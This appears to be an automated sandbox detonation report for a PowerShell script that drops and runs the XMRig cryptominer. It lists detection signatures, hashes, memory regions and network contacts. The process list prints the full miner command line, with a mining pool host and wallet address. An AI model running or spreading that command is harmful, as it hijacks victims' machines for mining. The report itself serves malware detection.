| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2628-9-0x00000233FA960000-0x00000233FA982000-memory.dmp
memory/2628-10-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/2628-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/2628-12-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/2628-13-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/2628-14-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:16
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 600 wrote to memory of 924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 600 wrote to memory of 924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/600-4-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp
memory/600-5-0x000001CD6DA20000-0x000001CD6DA42000-memory.dmp
memory/600-6-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp
memory/600-9-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp
memory/600-10-0x000001CD6DBF0000-0x000001CD6DC66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f2exdr3m.1y4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/600-25-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp
memory/600-48-0x000001CD6DF70000-0x000001CD6DF82000-memory.dmp
memory/600-61-0x000001CD6DAB0000-0x000001CD6DABA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/924-90-0x00000139DF730000-0x00000139DF750000-memory.dmp
memory/924-91-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-92-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/600-93-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp
memory/600-94-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp
memory/600-95-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp
memory/924-96-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-97-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-98-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-99-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-100-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-101-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-102-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-103-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-104-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-105-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-106-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-107-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-108-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-109-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-110-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-111-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-112-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-113-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-114-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-115-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-116-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-117-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-118-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-119-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-120-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-121-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-122-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-123-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-124-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-125-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-126-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-127-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-128-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-129-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-130-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-131-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-132-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-133-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-134-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-135-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-136-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-137-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-138-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-139-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-140-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-141-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-142-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-143-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-144-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-145-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-146-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-147-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-148-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-149-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-150-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-151-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-152-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-153-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-154-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-155-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
memory/924-156-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:50
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1396 wrote to memory of 4012 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1396 wrote to memory of 4012 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
Files
memory/1396-0-0x00007FFA6C4E3000-0x00007FFA6C4E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jswlmnae.hiq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1396-10-0x0000022F67E70000-0x0000022F67E92000-memory.dmp
memory/1396-11-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp
memory/1396-12-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp
memory/1396-14-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp
memory/1396-15-0x0000022F68240000-0x0000022F68252000-memory.dmp
memory/1396-16-0x0000022F67430000-0x0000022F6743A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4012-47-0x000002434E1D0000-0x000002434E1F0000-memory.dmp
memory/4012-48-0x000002434F940000-0x000002434F960000-memory.dmp
memory/4012-49-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-51-0x000002434F980000-0x000002434F9A0000-memory.dmp
memory/4012-50-0x000002434F960000-0x000002434F980000-memory.dmp
memory/4012-52-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/1396-53-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp
memory/1396-54-0x00007FFA6C4E3000-0x00007FFA6C4E5000-memory.dmp
memory/4012-55-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/1396-56-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp
memory/4012-59-0x000002434F980000-0x000002434F9A0000-memory.dmp
memory/4012-58-0x000002434F960000-0x000002434F980000-memory.dmp
memory/4012-57-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-60-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-61-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-62-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-63-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-64-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-65-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-66-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-67-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-68-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-69-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-70-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-71-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-72-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-73-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-74-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-75-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-76-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-77-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-78-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-79-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-80-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-81-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-82-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-83-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-84-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-85-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-86-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-87-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-88-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-89-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-90-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-91-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-92-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-93-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-94-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-95-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-96-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-97-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-98-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-99-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-100-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-101-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-102-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-103-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-104-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-105-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-106-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-107-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-108-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-109-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-110-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-111-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-112-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-113-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-114-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-115-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-116-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-117-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-118-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:56
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
